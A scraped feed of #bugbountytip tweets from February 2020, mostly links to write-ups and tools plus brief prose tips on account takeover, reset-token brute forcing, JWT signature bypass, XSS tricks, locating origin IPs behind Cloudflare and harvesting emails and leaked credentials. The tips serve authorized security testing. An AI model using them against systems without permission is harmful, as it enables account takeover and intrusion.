BUGemot
@bugemot


2020-02-24 22:11:44
0 Multiple Critical Vulnerabilities discovered in Open-Xchange https://t.co/uP4ZhTv6Ta CVE-2019-18846/CVE-2019-9853 - https://t.co/gAO6zM7D7O #bugbountytip #BugBounty #CVE #CyberSecurity
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-24 20:46:10
2 Information Gathering with Google.pdf https://t.co/mOzevBFm30 DNS Enumeration.pdf https://t.co/1BAccMMXRS Vulnerability Research Engineering Bookmarks Collection.txt https://t.co/aRQcnazzlG Escalating SSRF to RCE.pdf https://t.co/yUqgQNel5N #bugbountytip #hacking #pentest #OSINT
Steve Mcilwain
@steve_mcilwain


2020-02-24 18:03:46
3 Tired of manually tuning scope in Burp Suite? I just tried rescope by @root4loot. It let's you point to the URL of a bug bounty program and generate scope for Burp or Zap. https://t.co/9SdUJLbqEE #BugBounty #bugbountytips #bugbountytip
Noman | ู†ุนู…ุงู† | เคจเฅ‹เคฎเคพเคจ
@nomanAli181


2020-02-24 17:24:32
0 Few months back this portal first came on a diff subdomain, But I was done for the day and bookmarked it to analyze it next day but that host went down. Last week it came back on a new host and this time I was ready :) #bugbountytip monitor the targets you know/love #bugbounty https://t.co/7IIC0EXlIt
Pranav Hivarekar
@HivarekarPranav


2020-02-24 16:30:00
11 GraphQL Security Testing: Resources to learn- - https://t.co/tMqWzRtxLE - https://t.co/yvqDh89goj Research- https://t.co/1LSUUDHEnh Examples of bugs: - https://t.co/0yOBmHudTt - https://t.co/Ts6hgFJlxr - https://t.co/vNaECJNxa3 #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-24 15:49:27
2 SIM Api key leak found by @KHIZER_JAVED47 Tip: While do recon, always extract mobile App and read the files, some devs forgot API KEY, PASSWORD and other juicy stuff in it. (3 min read) https://t.co/ijrYjZOKT2 #bugbountytips #bugbountytip #bugbounty
baluz๐Ÿ”ฅ
@oyenom


2020-02-24 15:20:51
3 Bypass android ssl pinning apk No frida needed...... #bugbountytip #bugbounty https://t.co/FBgYMcjRws
baluz๐Ÿ”ฅ
@oyenom


2020-02-24 15:17:14
0 My blog no 3 bypassing ssl pinning of android apk #bugbounty #bugbountytip https://t.co/XYeM6zw6pN
baluz๐Ÿ”ฅ
@oyenom


2020-02-24 12:26:35
0 Accessing your phone through ssh https://t.co/a79A90Iz1D #bugbountytip #bugbounty
Shubham Arya
@iam_shubhamarya


2020-02-23 18:52:08
1 My first blog :) โ€œHack The Box Methodologyโ€ by Shubham Arya https://t.co/zmS4pzH0rv . . . . #Hacking #bugbountytip #bugbountytips #Hackers #Hackthebox #CyberSecurity #Python #programming #code
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 18:09:20
4 SQLi Without Quotes (MariaDB) https://t.co/W7bdONVllL Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devsecops #cybersecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 17:26:54
1 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ICR7fEC3i8
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 14:05:03
1 ๐ŸคฃFollow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/tNflpuxYZq
Your Next Bug Tip
@YourNextBugTip


2020-02-23 12:07:35
5 Badoo Acc Takeover - Create 2 Accs & link 2 diff fb acc in each of them - As attacker import pics via fb & copy the link - Send the link to victim - Login via attacker's fb in victim's acc Hacked by @rootxharsh https://t.co/08VkMXaDbS #bugbountytips #bugbountytip #bugbounty
siLLyDaDDy
@sillydadddy


2020-02-23 11:13:57
0 #bugbountytip I am very very new to bug bounty . But my experience in other fields have taught me "how to learn " I see , my brothers/friends just taking a course and trying hard , really hard on bug bounties If your axe is blunt no matter how hard u hit u cannot cut a tree
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 07:04:52
0 #Swag For Hackers and Bug Hunters Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8tJRnZ8O2U
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 04:53:59
1 #SpiderMan vs #HackerMan Follow Us for Bug Bounty Tips #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8MHcRUYdOH
Your Next Bug Tip
@YourNextBugTip


2020-02-23 03:40:15
5 Click Reset Pwd N times U will get N links If first link still works Then issue as much as links possible Bruteforcing Token will be easy If there is no rate limit then B000M Write Up by @LnaziJubaerSec https://t.co/VcExv4xer1 #bugbountytips #bugbountytip #bugbounty
Security Executions Code
@pwn0sec


2020-02-23 00:38:44
1 Googleapis /auth/admin/* #bugbountytip #bugbountytips #google https://t.co/VdADtMDFwN
Steve Mcilwain
@steve_mcilwain


2020-02-22 17:11:42
0 I store recon data on my VPS, then sync it to my laptop with sshfs and rsync (in WSL) sshfs <user>@<rhost>:~/data /mnt/data rsync -avu /mnt/data /mnt/d/recon/data fusermount -u /mnt/data #PenTest #BugBounty #bugbountytip #bugbountytips #OSINT
ghostlulz
@ghostlulz1337


2020-02-22 16:37:00
5 CSV Injection: https://t.co/loAf6mRXft ClickJacking: https://t.co/kcOYSJcbUG Exposed Firebase DB: https://t.co/WGzatNLO3C Config Files: https://t.co/Kft6p37wJM Kubernetes API : https://t.co/IZyHZ1gUJt #bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss https://t.co/73dOl6kmfM
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-22 15:22:21
9 100 ways to discover (part 1).pdf https://t.co/kCMiq7Zo1o Pentesting.pdf https://t.co/gqpXSJ29D7 Building a Malware Analysis Lab:Become a Malware Analysis Hunter in 2019.pdf https://t.co/pOvtev7KqN #bugbountytips #hacking #OSINT #pentest #redteam #Malware #bugbountytip #infosec
siLLyDaDDy
@sillydadddy


2020-02-22 13:00:12
2 #bugbounty #bugbountytip All the bug bounty write ups from @PentesterLand in an excel format . https://t.co/9xNrXKNzaP I just wanted to keep track of the https://t.co/2BlY5zTycw i pulled out the data .Hope @PentesterLand wont mind !!
Vijaysimha Reddy Bathini
@fatratfatrat


2020-02-22 11:34:58
5 My new writeup on account takeover vulnerabilities. Thanks to @Bugcrowd . https://t.co/GeLF2Xatoh #BugBounty #infosec #bugbountytip #bugbountytips #bugcrowd #CyberSecurity
Your Next Bug Tip
@YourNextBugTip


2020-02-22 08:38:15
5 Open Redirect to Account Takeover when token didn't leak Takeover is only possible when token leak with get request. But he manage to takeover without it. Profile https://t.co/VyQuQ70sqf https://t.co/Oy52jljsrG #bugbountytip #bugbounty #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-22 08:32:59
0 Usefull Link to Learn Pentesting and Bug Bounty : If you want to learn Cyber Security and Ethical Hacking from professionals - Reach out to us ! https://t.co/iNczOcXY13 https://t.co/E2teD1IjCh #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-22 08:30:20
0 OWASP Vulnerabilities https://t.co/rYwbpkyizq Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-22 08:26:57
1 Vulnerability Rating Taxonomy - VRT Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 https://t.co/Td94mIsExN #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
ghostlulz
@ghostlulz1337


2020-02-21 23:55:01
1 Client Side Template Injection is the modern day XSS. People think frameworks like Angular are immune to XSS but it isn't. Its just a little bit different to execute.More info on my blog https://t.co/JnSGKDmvLm #BugBounty #bugbountytips #infosec #bugbountytip #redteam #Angular https://t.co/q2VZmkMsIs
Tomi Koski ๐Ÿ’พ๐Ÿ’€
@tomikoski


2020-02-21 18:51:33
0 Ahoy all #BugBounty hunters, support marvelous work from creator of #ffuf and sponsor this dude @joohoi at #github You can do it๐Ÿค˜#bugbountytip
Shifa
@shifa_skh


2020-02-21 16:08:14
2 Alway convert parameter to array you will get unexpected result, some times xss bypass Like, path=/abc to path["]=/abc #bugbountytip
Israel Thomas
@IsraelThomas_7


2020-02-21 14:28:23
0 John Doe: Read the damn documentation before you start hunting on my program. Me: Yeah sure, I'm still checking for the hidden document endpoint. ๐Ÿ˜ #bugbountytip #infosec
Mayur Parmar
@th3cyb3rc0p


2020-02-21 13:26:48
0 Pro tip for bug hunting while making report dont forget to add fix of that vuln. It will increase to get bonus points/bounty. #th3cyb3rc0p #bugbountytip #bugbounty @intigriti @Bugcrowd @Hacker0x01 @openbugbounty @synack
apuhc
@apuhccc


2020-02-20 20:38:24
0 #ProTip #burpsuite #bugbountytip by @Agarri_FR (thank you master ) https://t.co/uuptoV0KtV
Sofiane Hamlaoui
@S0fianeHamlaoui


2020-02-20 15:21:50
4 @CyberSecCare CyberSecCare : A python Twitter that retweets all Security-Related tweets. Video on Youtube : https://t.co/lHmtfXOy1e #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/Qv7NuXk5A4
Security Executions Code
@pwn0sec


2020-02-20 15:06:11
2 Reflected (XSS) Vulnerability - on https://t.co/d5oILl2Zpw (Sandbox Domain) https://t.co/JeyZTE46cc #bugbountytip #bugbountytips #googlexss #xss https://t.co/9jesYX7z3S
Security Executions Code
@pwn0sec


2020-02-20 14:10:48
1 Broken Authentication and session management (OWASP A2) https://t.co/iFznOWZvfv #bugbountytip #bugbountytips #owasp https://t.co/0yZGL5z3al
Mohit Sharma
@ms1241721


2020-02-20 12:45:09
0 #Bugbountytip Founded no rate limit on login page : Reported but got Duplicate Tried again on another critical endpoint : Triaged Lesson learnt - If one endpoint is vulnerable , check all other, chances are they will also be vulnerable
Bug Spotter ๐Ÿ”
@BugSpotter


2020-02-20 03:58:36
0 "Good bugs do not require grear skills! They require sharp eyes" -Anees Khan #infosec #BugBounty #Bugbountytip
Mourad
@SecuAudit


2020-02-19 20:10:32
2 Everything is marked as "Low severity" and There is nothing you can do except leaving this program. #BugBounty #Bugbountytip @Hacker0x01 https://t.co/V9zRDo9Vxb
GokhanGK
@gkhck_


2020-02-19 19:40:43
1 New write-up ๐Ÿฅณ๐Ÿฅณ๐Ÿฅณ #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/E4UnlvFHWi
Leonishan
@leonishan_


2020-02-19 19:00:31
3 WAF Bypassing with Unicode Compatibility https://t.co/jSccqnlGQC #BugBounty #Bugbountytip #WAF #wafbypass #XSS
theCBTL_Edge
@theCBTL_Edge


2020-02-19 18:32:10
0 Researchers have tricked Tesla vehicles into accelerating from 35 mph to 85 mph using duck tape. The researchers modified the shape of a 3 to look like an 8 on multiple street signs. #Tesla #Bugbountytip
Manyasa Oliver
@M_Oliver_Watiti


2020-02-19 18:26:12
0 Anyone Who Has come accross .htmopt extention anywhere? #Bugbountytip #bugbounty
Pranav Hivarekar
@HivarekarPranav


2020-02-19 17:00:01
6 Mastering the Skills of Bug Bounty by @vickieli7 via @thestartup_ https://t.co/LZGj7GQW5n #bugbounty #bugbountytip
z3rb0a
@OwlCyberGhost1


2020-02-19 16:02:41
0 #bugbountytip #bugbounty Wreid Bug. Changing my username to number 10 or 12 or ...10000 will disclose other user Information ( Including Access token & Session token ) Lol xD
Shubham Sharma
@Shubham_pen


2020-02-19 14:32:44
0 Meterpreter, a highly developed payload that can be extended dynamically, is known to be Hackerโ€™s Swiss Army Knife. @rajchandel @kalilinux #cybersecurity #infosec #pentest #oscp #meterpreter #Bugbountytip #Hackers #WednesdayWisdom https://t.co/PbDAnudJFL
Nameless
@3301o


2020-02-19 13:23:28
0 When use WayBackUrls by @TomNomNom, use below Regex to find parameterized URL(s): \/[A-Za-z0-9_.-]*[a-z]*\?.*= #bugbountytips #Bugbountytip #BugBounty
Cyber Security Bot
@CyberSecCare


2020-02-19 09:47:15
3 Follow to get all Security/Cyber Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
CyberTaters
@CyberTaters


2020-02-19 08:58:16
2 Follow to get all Security/Potato Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #potatosecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #mashing
Cyber Security Bot
@CySecuritybot


2020-02-19 08:58:11
2 Follow to get all Security/Cyber Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
Manoj Khadka
@Manojkhd


2020-02-19 08:39:52
0 Websites vulnerability and Bug reporting @Administor #Bugbountytip #bughunter #vulnerable #webserver #xss #crsf https://t.co/Go7DFoSqBR
HackIsOn ยฎ
@hackison


2020-02-19 08:17:49
2 #Bugbountytip If you want to bypass cloudflare protection and find the targetโ€™s origin ip. Use : https://t.co/TGirjy7p2g to find targets domainโ€™s DNS history. C2C ๐Ÿค— #bugbounty #bugbountytip #bugbountytips #hackison #hacking #vapt #wapt #pentesting #redteaming #redteam
Oghenejivwe ๐Ÿ‡ณ๐Ÿ‡ฌ๐Ÿ—ฏ
@realOghenejivwe


2020-02-19 06:20:25
0 I need to find my first bug. Not even because of the money. For my mental health. #BugBounty #Bugbountytip
Pratik Yadav
@PratikY9967


2020-02-19 05:29:18
0 Sometime .gitignore file can help you to get database credentials as well try to visit all endpoints endpoints showed up by gitignore on all subdomains :)๐Ÿ˜‚๐Ÿ˜‚ #bugbountytip #bugbounty #infosec https://t.co/qAjnmRXLgs https://t.co/lGKsuT7C5x
Joseph Melika
@jmelika


2020-02-19 04:16:30
0 #bugbountytip When you see SSO with JWT, intercept, decode, change the alg to either none or HS232 to bypass signature and send the new encoded JWT instead. If it goes through, you hit the jackpot. #SecureTheInternet #CESPPA #bugbounty #bugbountytips
Hx01
@Hxzeroone


2020-02-18 16:31:35
2 #Bugbountytip If you want to bypass cloudflare protection and find the targetโ€™s origin ip. Use : https://t.co/NU3CNcekJi to find targets domainโ€™s DNS history. https://t.co/yz1Z2jGKvN
ALL ABOUT HACKER
@AboutHacking


2020-02-18 16:24:43
0 How to start Bug Bounty Hunting Read: https://t.co/9DAu77YcZ8 #CyberSecurity #bugbounty #bugbountytips #bugbountytip
Pranav Hivarekar
@HivarekarPranav


2020-02-18 15:30:00
8 WebSockets Security Testing: - https://t.co/yjUbgZJeZY - https://t.co/Gf6dofbt7J - https://t.co/ykbQAv6b8G Tools: - https://t.co/tw3icPAFZS - Burp - https://t.co/UpH9TM3TWK Case studies: - https://t.co/AaY9a6GFQ1 - https://t.co/0D1c9c8bhW #bugbounty #bugbountytip #infosec
Shubham Sharma
@Shubham_pen


2020-02-18 15:18:58
1 Today you will learn how to escalate the root shell if docker is running on the hots machine or I should say @Docker privilege escalation to spawn root shell. @rajchandel @ubuntu #cybersecurity #pentest #ITSecurity #bugbountytip #infosec #tuesdayMotivation https://t.co/4vYoWaz2fY
Brett Russell ๐ŸŒ
@brettarussell


2020-02-18 15:06:45
0 You're smart when you can set your own Bug Bounty. Unfortunately they chose to reward themselves handsomely. #bugbountytip https://t.co/7V1A8iZd30
Brett Russell ๐ŸŒ
@brettarussell


2020-02-18 15:04:05
0 @crypto_bobby You're smart when you can set your own Bug Bounty. Unfortunately they chose to reward themselves handsomely. #bugbountytip
Seasoned Cyber Security Professionals
@scspcommunity


2020-02-18 14:45:36
2 Bug Bounty Tips part 3 #bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bugcrowd #hacker #ethicalhacking #hacking #Pentesting #webapp #webappsec #appsec #applicationsecurity #infosec #cybersec #cybersecurity #informationsecurity https://t.co/YMP5pCY7yE
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2020-02-18 14:06:11
3 Also, You can check the domain, if it have any private program on Bugcrowd by looking it's TXT record with dig dig TXT domain.tld | grep bugcrowd #BugBounty #BugBountyTip #OutHackThemAll https://t.co/WCbwg4ZNxo
Jake Miller
@theBumbleSec


2020-02-18 13:01:10
15 I am excited to release my new tool GadgetProbe: Inspect endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote classpaths. No more sitting in the dark if ysoserial doesn't fire. https://t.co/lJfeIMMzeU #bugbounty #bugbountytip
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2020-02-18 12:10:07
1 Hey Bug Bounty Folks, Want more private programs on Bugcrowd? Just visit this https://t.co/iqgKAiy5Xr Also, dig TXT domain.tld | grep bugcrowd #BugBountyTip ๐Ÿค™
Nouroz Gaming
@NourozGaming


2020-02-18 08:05:58
0 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/rtAQmQFkUU
Khaled Mohamed
@0xElkomy


2020-02-17 21:03:25
0 OneLogin authentication bypass on WordPress sites https://t.co/6NcFwEg5lk #bugbountytips #bugbounty #bugbountytip
CyberTheReapeRโ˜ข
@CyberTheReapeR5


2020-02-17 19:07:41
0 Yay, i earned 300$ I did not win this award on any bug bounty platform #hackerone #bugcrowd #infosec #bugbountytip
m0z
@LooseSecurity


2020-02-17 18:51:32
1 Three really good event handlers for XSS would be: onfocus onsearch And also using accesskeys, which is usually low severity but a really easy way to get XSS as it bypasses most security measures. #bugbountytips #bugbountytip #bugbounties #infosec #infosecurity #coronavirus
Your Next Bug Tip
@YourNextBugTip


2020-02-17 17:18:32
5 XSSI and JSONP found by Omkar Bhagwat @th3_hidd3n_mist Important notes and #bugbountytips at the end of the WriteuP Vul Worth $$800$$ If you are new to XSSi and JSONP then MUST READ the WriteuP #bugbountytip #bugbounty https://t.co/vOguXKK8Te
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-02-17 16:11:46
1 1) Data Processing (IBB) disclosed a bug submitted by geeknik https://t.co/yqNZldQJ1p 2) \[API\] ICQ user's avatar can be manipulated remotely https://t.co/O31iYklXPk #bugbountytips #bugbounty #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-02-17 16:11:14
2 1) CORS misconfiguration which leads to the disclosure of certain data concerning the user\. https://t.co/AfzrUS0BAh 2) JAVASCRIPT INJECTION IN SIX ANDROID MAIL CLIENTS https://t.co/RAo0IlmgEV #bugbountytips #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-17 09:24:29
2 Cisco Type 7 Reverser Paste any Cisco IOS "type 7" password string into the form below to retrieve the plaintext value. Follow Hackdoor - https://t.co/iNczOcGmCt https://t.co/uTzPKkBn6S #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-17 09:19:05
3 CEHv9-Notes - If you want to be professional Penetration Tester and Bug Bounty Expert - Follow Hackdoor : Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #cybersecurity https://t.co/LIlYcZOBk7
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-16 21:59:57
0 CTF Challenges Archives: https://t.co/xFeGOlUGhs #bugbountytip #hacking #pentest #redteam
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-16 21:53:51
1 Find Secret API-Keys: https://t.co/6BZkftxJnJ #bugbountytip #hacking
Andrew Roe
@aroe1994


2020-02-16 21:04:18
0 We are LIVE with #HackTheBox! https://t.co/a2ASaTS2z3 #cybersecurity #bugbountytip
CyberTheReapeRโ˜ข
@CyberTheReapeR5


2020-02-16 17:28:08
0 ฤฐ earned 2.000$ (I did not win this award on any bug bounty platform) Bugs: 2 subdomain takeover 2 xss (self and reflected) 1 sql injection 1 SQL database username and password information. Total: 2.000$ #hackerone #bugcrowd #infosec #bugbountytip
ghostlulz
@ghostlulz1337


2020-02-16 16:55:45
0 Bug Bounty Slack Group over 1,500 hackers. If your looking for a space where you can chat, learn, share knowledge, and meet like minded people you should check out my slack channel. https://t.co/lwmVfsjSPm #bugbounty #bugbountytips #bugbountytip #infosec #redteam #security https://t.co/RBR2vQBlFN
Pranav Hivarekar
@HivarekarPranav


2020-02-16 14:04:43
12 SAML Security Testing Tutorial: 1 - https://t.co/imIWYX6AdF 2 - https://t.co/Gz9Vg2DeoX 3 - https://t.co/RVX6m56n0W Attack Surface: https://t.co/DIsjXQYJ06 Examples of bugs: - https://t.co/D6aHlzTxlA - https://t.co/YFy5SHYHL4 - https://t.co/e74Msi6a3k #bugbounty #bugbountytip
Shubham Patel
@Shubham_4500


2020-02-16 07:51:52
0 #bugbountytip #bugbountytips Report First and then in free time do the additional exploit , got duplicate with the difference of 4 reports, its part of bugbounty life :) lesson learned with heart full of guilt. #hackerone #bugbountylife #bugcrowd https://t.co/g0aBsB8I2G
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-16 07:25:48
7 Which one do you prefer ? #GOOGLE v/s #DUCKDUCKGO Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/9YlR6DAjcZ
ghostlulz
@ghostlulz1337


2020-02-16 03:20:13
10 You know Django, Flask and many other python web libraries are vulnerable to RCE when you enable debug mode. Most people don't know this is possible. More info on my blog: https://t.co/rpPIaQpDaL #bugbounty #bugbountytips #bugbountytip #redteam #infosec #flask #django #python https://t.co/JrUzyoI10q
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-16 02:46:26
0 #unc0ver v4.0.0 is NOW OUT - Now with full-fledged support for A12-A13 devices on iOS 13.0-13.3 with Cydia and system-wide tweak injection! Get it at: https://t.co/Wfzq4z4aQU Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-15 17:59:50
1 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jDvHB5ty2z
Edwin Digital #digitalke #edmuke
@digitalked


2020-02-15 17:23:31
1 Do you like the wayback machine? Do you like sqli injection? What happens when you combine them both, you get a unique sqli scanner. Check out my blog for more info: https://t.co/a80MXOn1er #BugBounty #bugbountytips #bugbountytip #osint #hacking #dfir #infosec #sqli
Abdullah Fares Muhanna
@amad3u6


2020-02-15 16:48:11
1 @Burp_Suite To avoid @zaproxy crashes when you have Large Response, try to install oracle JDK instead of OpenJDK #bugbountytips #bugbountytip #bugbounty #infosec
Abdullah Fares Muhanna
@amad3u6


2020-02-15 16:43:25
1 You can specify memory size for @Burp_Suite to make it more smoother by using -Xmx (3GB example): ~$ java -jar -Xmx3072M /path/to/burpsuite.jar or ~$ java -jar -Xmx3G /path/to/burpsuite.jar #bugbountytips #bugbountytip #bugbounty #infosec
ghostlulz
@ghostlulz1337


2020-02-15 15:53:12
2 If your looking to make a ๐Ÿค‘living๐Ÿค‘ doing Bug Bounties or Pentesting you may want to get a copy of my book. Easy wins all day๐Ÿ’ฐ. https://t.co/zJFRZjg5q2 #bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #appsec #cybersecurity #xss #hacker #cyber #security https://t.co/rSdiFyIR9U
Nikhil Mahajan
@mahajan344


2020-02-15 15:02:38
0 want to do a static and dynamic analysis of android apps on the fly / on the web. use @apklabio They provide very good static /dynamic /network analysis of apk files. #AndroidSecurity #bugbountytip #bugbounty #AndroidHackingMonth on @Hacker0x01 https://t.co/cNXt1gKLvg
Str0k1rch๐Ÿดโ€โ˜ ๏ธ
@str0k1rch


2020-02-15 13:01:24
1 Make sure to update fellow hacker ;) #bugbountytip https://t.co/SzEKGgxNaX
Khaled Mohamed
@0xElkomy


2020-02-15 11:03:07
0 Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target. https://t.co/Yhzwb92gOV #bugbountytips #bugbounty #infosec #bugbountytip
Pranav Hivarekar
@HivarekarPranav


2020-02-15 08:48:57
7 Shodan Pentesting Guide https://t.co/ef11lug0EW #bugbounty #bugbountytip
Hridoy Ahmed
@hridoysec


2020-02-15 05:43:41
0 #bugbountytip from @TH3G3NT https://t.co/jRtpMU2f1F
Your Next Bug Tip
@YourNextBugTip


2020-02-15 04:39:55
0 Must Read #bugbountytip https://t.co/haPpJR89XF
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-14 19:14:04
1 #BugBountyTip : Be creative with wordlists. #Seclists is great but every bug hunter uses it. If you are looking for non-#duplicates use #CRUNCH to generate your own wordlists specific to your web app / api platform ! Follow #Hackdoor - https://t.co/iNczOcGmCt #bugbountytips
Steve Mcilwain
@steve_mcilwain


2020-02-14 16:48:01
0 Automate your recon screenshots via command line or script with Eyewitness. Can take a file of URLs as input. https://t.co/Tc6yWK3ulG #pentest #pentesting #bugbountytip #bugbountytips #hacking
Your Next Bug Tip
@YourNextBugTip


2020-02-14 16:42:46
2 Unique way of Account Takeover @0xAkash figure out how to create password reset token!! Must Read (2 min read) https://t.co/Xfax4i7lSN #bugbounty #bugbountytips #bugbountytip
Imran Parray
@CreedHackers


2020-02-14 16:40:52
1 #BugBountyTip You will always Find what you are looking for. So if you haven't found a RCE,SSRF or any other critical ones yet. Probably you aren't looking for them.
Your Next Bug Tip
@YourNextBugTip


2020-02-14 14:11:24
0 What are some good Hacker's Groups? On #Discord #Slack #anyPlatform #bugbounty #bugbountytips #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-14 13:12:35
11 use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons: https://t.co/lBtuovYuWB 19-extensions-to-turn-google-chrome-into-penetration-testing-tool: https://t.co/f2rcEFu7LX #bugbountytip #hacking #pentest #BugBounty
Kartik Charande
@kartikraj909


2020-02-14 09:49:51
0 Amazing write up quick explanation #bugbountytip #infosec https://t.co/ezJBqzZdrw
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-14 06:01:12
3 SimplyEmail: -setup: curl -s https://t.co/MO25nwVDJD -usage: ./SimplyEmail -all -v -e https://t.co/KdHhpMULry results: firefox https://t.co/KdHhpMULry<date_time>/Email_List.html -1-email address format of the target -2-list of valid users #OSINT #pentest #bugbountytip #hacking
Mourad
@SecuAudit


2020-02-13 22:31:42
0 @Godaddy Bug Bounty is a scam , i got a lot of testimonials of security researchers scammed by them #bugbounty #bugbountytip #bugbountytips #infosec #Hacker0x01 @GoDaddyCanada @GoDaddyHelp https://t.co/GcoryY6rbf
Mast3rM1nd
@lollysofsof


2020-02-13 22:25:54
2 let's educate each others :) #infosec #pentesting #bugbounty #bugbountytip
